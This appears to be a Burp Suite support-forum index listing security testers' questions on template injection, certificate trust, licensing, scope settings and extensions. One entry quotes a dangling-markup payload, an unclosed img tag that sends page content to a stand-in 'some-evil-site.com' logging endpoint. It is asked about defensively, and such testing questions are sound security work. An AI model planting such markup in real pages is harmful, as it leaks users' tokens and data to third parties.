How Do I?
angularJS - Client-Side Template Injection
Hello - I'm testing a web app that is using AngularJS v1.3.11. Burp has flagged multiple high risk client-side template injection issues with a confidence of firm. I'm trying to figure out if this is a false positive or something I need to report. Essentially, Burp is flagging that it is possible to inject arbitrary expressions into the client template. An example would be were user...2 Agent Answers 5 Community AnswersApr 05, 2017 09:19PM UTC
Does Burp Collaborator test for "dangling markup" vulnerabilities?
This article on github (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email ) outlines an attack where an attacker injects an unclosed img tag <img src='https://some-evil-site.com/log_csrf?html= which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data. Question, d...1 Agent Answer 0 Community AnswerApr 03, 2017 10:55PM UTC
Interception turned off upon starting
Hello, I would like to ask you how should I save (and load) a burpsuite project that on start, upon loading from a .burp file, interception will be turned off? Thanks.1 Agent Answer 1 Community AnswerApr 03, 2017 02:16PM UTC
Since iOS 10 can't trust Burp anymore, recommended alternatives?
Since iOS 10 can no longer really "trust" the Burp Suite certificate, does anyone have any alternatives that free? While it shows up as trusted in iPhone, it still marks it as not secure when browsing to a site that uses the trusted burp certificate. I saw someone mention use a wildcard cert, but letsencrypt doesn't support it. Just trying to figure out an alternative to being able ...1 Agent Answer 1 Community AnswerMar 31, 2017 03:57PM UTC
I am not able to activate my burp license after formating my laptop.
My laptop had windows 10 pro burp installed. After formatting I installed windows 10 single language and tried to activate burp but no luck, it says "activation failed no more activation for this license". But burp was activated on this pc Kindly suggest what to do in this case. Is there any way that I can activation burp on my PC? Is my license going to waste?1 Agent Answer 0 Community AnswerMar 31, 2017 05:40AM UTC
Burp shows super tiny window&letters
Hi, When opening Burp on my Dell 5510 it won't maximize and it shows tiny window&letters. What settings should I change to see Burp at normal size and not in miniature. Also, I am not able to install any new updates as it freezing at 100% download. The download will not complete.2 Agent Answers 1 Community AnswerMar 31, 2017 02:31AM UTC
Change part of a URL in a project
Hi, We have extensively done browsing to record as most URLs as possible for a particular website, and tested that version, which resides in: www.mydomain.com/uat/application. Now we've moved the same website to another URL, and we access that through: www.mydomain.com/preprod/application. The website, hyperlinks, pages, and applications are the same, but they are placed in another a...1 Agent Answer 0 Community AnswerMar 28, 2017 06:20PM UTC
Hello, I have corporate license for Burp Suite Professional. Which product do I need to download to activate it? Trial version of Burp Suite professional? Will I be able to activate Pro license on it? Or just download Free edition, and activate license? Thank you.2 Agent Answers 1 Community AnswerMar 28, 2017 10:49AM UTC
Manipulate Header Request Parameter in Extension
Hi, I want to build up a automatic test system for a json api. My plan is as follows: Initially I get a fresh login token. Then i get into the proxy (processProxyMessage) and to replace the token with my freshly acquired login token. My problem is that I cannot update the content of my request. The token just doesnt change. Pseudocode: public void processProxyMessage(boolean messageIsRe...1 Agent Answer 0 Community AnswerMar 27, 2017 04:09PM UTC
SiteMap & Spider Out-Of-Scope Entries
Hi, I have an application that I'm testing with thouthands maybe more of urls like example.com/[0-9]+ and I don't want to go thru them all not in Sitemap/Proxy/Spider so first I setup a rule in Scope Exclude with ^example\.com$ ^/[0-9]+.* and I have this settings in: Spider/Control/Spider Scope: Use Suite Scope Project Options/Connections/Out-Of-Scope: Use Suite Scope and Drop ...1 Agent Answer 0 Community AnswerMar 26, 2017 10:01PM UTC